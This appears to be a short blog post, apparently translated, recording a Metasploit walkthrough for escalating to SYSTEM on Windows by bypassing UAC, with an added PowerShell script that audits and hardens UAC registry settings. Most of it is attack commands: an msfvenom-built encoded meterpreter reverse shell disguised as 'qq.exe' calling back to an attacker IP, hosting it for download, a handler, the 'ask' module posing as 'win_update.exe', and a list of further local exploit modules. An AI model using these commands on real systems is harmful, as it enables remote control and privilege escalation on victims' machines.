Privilege escalation by bypassing UAC

Posted by Tattoo on 2020-05-15


This is fairly simple; just recording the steps.

1. Generate the exe remote-control payload

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o /opt/qq.exe

-b characters to avoid in the output
-e encoder
-i number of encoding iterations
-f output file type
-o output path

2. Upload the exe to the target machine

Start the Apache service

service apache2 start
cp /opt/qq.exe /var/www/html

3. The target machine visits the URL and downloads the file

http://attacker-ip/qq.exe

4. msfconsole

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip
exploit

5. Run the exe file

At this point a session is returned.

Enter it to escalate privileges

sessions -i 1
load priv  -- load the privilege extension
getsystem

6. getsystem fails

use exploit/windows/local/ask    -- select the privilege-escalation module
set lhost ip
set filename win_update.exe
set session 1
exploit

7. Obtain another session

sessions -i 2
load priv
getsystem

8. Privilege escalation succeeded

shell    -- drop to a system shell
whoami   -- check the current user; it is now SYSTEM
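As an added, defender-side example that is not part of the original post: a PowerShell check of the UAC policy values under the well-known Policies\System key against an "Always notify" baseline. That baseline removes the silent auto-elevation UAC-bypass modules depend on; it does not stop a user clicking Yes on a prompt like the one the ask module raises, which comes down to not working in an admin account day to day. The baseline values are an assumed hardening choice, not something the post specifies.

```powershell
# Added example, not from the original post. Assumption: the "Always notify"
# values below are the hardened target; adjust if your policy differs.
$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Hardened values: UAC on, admins always prompted, prompt on the secure desktop.
$UacBaseline = @{
    EnableLUA                  = 1
    ConsentPromptBehaviorAdmin = 2   # 5 (default) lets auto-elevate Windows binaries elevate silently
    PromptOnSecureDesktop      = 1   # 0 lets ordinary windows draw over the prompt
}

function Test-UacBaseline {
    # Returns one row per setting with the observed value and an OK/WEAK verdict.
    $current = Get-ItemProperty -Path $UacKey
    foreach ($name in $UacBaseline.Keys) {
        $actual = $current.$name
        [pscustomobject]@{
            Setting  = $name
            Actual   = $actual
            Expected = $UacBaseline[$name]
            Status   = if ($actual -eq $UacBaseline[$name]) { 'OK' } else { 'WEAK' }
        }
    }
}

function Repair-UacBaseline {
    # Writes the baseline values; must run from an elevated prompt.
    # A change to EnableLUA only takes effect after a reboot.
    foreach ($name in $UacBaseline.Keys) {
        Set-ItemProperty -Path $UacKey -Name $name -Value $UacBaseline[$name] -Type DWord
    }
}

$report = Test-UacBaseline
$report | Format-Table -AutoSize
if ($report.Status -contains 'WEAK') {
    Write-Warning 'UAC is below the Always-notify baseline; run Repair-UacBaseline from an elevated shell.'
}
```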

9. Summary

Other privilege-escalation modules

use exploit/windows/local/bypassuac_injection

use exploit/windows/local/ms13_053_schlamperei

use exploit/windows/local/ppr_flatten_rec

use exploit/windows/local/ms13_081_track_popup_menu

use exploit/windows/local/ms13_097_ie_registry_symlink
